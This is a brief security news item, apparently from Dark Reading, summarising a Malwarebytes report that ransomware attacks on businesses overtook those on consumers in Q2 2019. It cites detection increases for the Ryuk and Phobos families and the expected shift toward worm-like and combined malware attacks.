For the first time, the number of ransomware attacks against businesses surpassed those against consumers, with the former up 363% Q2 2019 over Q2 2018, according to a new report from Malwarebytes.

Ransomware seems likely to continue its evolution in the second half of 2019, the report states, as malicious actors use attacks with worm-like functionality, along with ransomware attacks paired with other malware, in their attempts to get through security protections and make the most from their malicious investments.

Looking more deeply into the data, the report found certain families of ransomware predominated in detections, with Ryuk detections increasing by 88% over the first quarter of 2019, while Phobos exploded 940% in the same time.

Read more here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/ransomware-shifts-focus-from-consumers-to-businesses/d/d-id/1335478?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple